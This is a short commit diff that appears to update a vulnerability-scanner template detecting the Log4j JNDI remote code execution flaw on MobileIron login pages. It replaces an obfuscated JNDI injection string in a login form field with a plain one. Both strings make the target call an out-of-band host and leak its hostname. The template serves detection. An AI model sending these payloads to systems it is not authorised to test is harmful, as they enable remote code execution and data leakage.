Fixed mobileiron-log4j-jndi-rce (#4060)
parent
ff6e4cda72
commit
3d15307605
|
@ -22,7 +22,7 @@ requests:
|
||||||
Referer: {{RootURL}}/mifs/user/login.jsp
|
Referer: {{RootURL}}/mifs/user/login.jsp
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
j_username=${j${k8s:k5:-ND}i${sd:k5:-:}${lower:l}d${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee
|
j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -43,4 +43,4 @@ requests:
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
||||||
|
|
||||||
# Enhanced by cs on 2022/02/28
|
# Enhanced by cs on 2022/02/28
|
Loading…
Reference in New Issue